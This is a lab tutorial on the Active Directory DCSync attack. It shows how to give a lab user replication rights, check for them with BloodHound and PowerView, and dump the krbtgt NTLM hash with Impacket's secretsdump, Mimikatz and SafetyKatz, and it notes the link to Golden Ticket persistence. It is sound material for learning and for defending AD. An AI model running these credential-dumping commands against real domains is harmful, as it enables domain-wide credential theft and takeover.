8.7.2 - DCSync Attack
DCSynk Attack
DCSynk Attack is a tecnique used in post-exploitation scenarios in order to extract sensitive data from an AD domain by abusing the AD replication feature, which guide how DC synchronize data between themselves.
The DCSync attack trucks a DC into thinking the attacker is another legitimate DC that needs replication data.
The replication data extract with this attack includes:
NTLM password hashes (including krbtgt)
Kerberos key
Password hystory
So, DCSync can be combined with other attacks, such as the Golden Ticket attack, to establish persistance into a domain
Configuration of a vulnerable user
Go into Domain Controller account:
Open Active Directory Users and Computers
Click on DC: dev-angelist.lab -> Properties -> Security -> Add (devan), Check Names, Ok

Select devan user and mark as allow these three permissions:
Replicating Directory Changes
Replicating Directory Changes All
Replicating Directory Changes In Filtered Set
and confirm.

In alternative is possible to set them using AD module command:
Import-Module .\RACE.ps1
Set-ADACL -SamAccountName devan `
-GUIDRight DCSync `
-DistinguishedName 'DC=dev-angelist,DC=lab' `
-Verbose
Check if a machine is vulnerable to DCSync attack
We can check if all go right using BloodHound:
python3 -m venv venv
. venv/bin/activate
pip3 install bloodhound
bloodhound-python -u administrator -p 'P@$$W0rd' -ns 192.168.57.9 -d dev-angelist.lab -c All --zip

we can common upload it ang log-in using neo4j or using bloodhound-cli tool:
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
./bloodhound-cli containers start
#Access to Bloodhound UI at: http://127.0.0.1:8080/ui/login
#Go to file ingest and upload bloodhound zip file generated
#And check: Dangerous Privileges -> Principals with DCSync privileges
If there're "AllExtendedRights" and "GenericAll" permissions we can perform DCSync Attack.
In alternative, we can use PowerView (if we've access to Devan machine):
Get-ObjectAcl -SamAccountName devan -ResolveGUIDs | ?{$_.ActiveDirectoryRights -match "Replicating"}
or we can check it on attacker machine (linux / kali) using Secretsdump module of Impacket:
secretsdump.py 'devan:new_password123'@192.168.57.9
Mimikatz
Let's assume we've a low privileged access to a workstation joined into the domain, in my case i log into: dev-angelist\devan
's account.
Download and extract Mimikatz:
iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
#Win32 Folder in this case, because this machine is 32bit
and run it to leak the NTLM hash of krbtgt user:
.\mimikatz.exe
lsadump::dcsync /domain:dev-angelist.lab /user:krbtgt" "exit"
Using Safetykatz
C:\Users\Administrator\Documents\Tools\SafetyKatz.exe "lsadump::dcsync /user:dev-angelist\krbtgt" "exit"
Labs
Last updated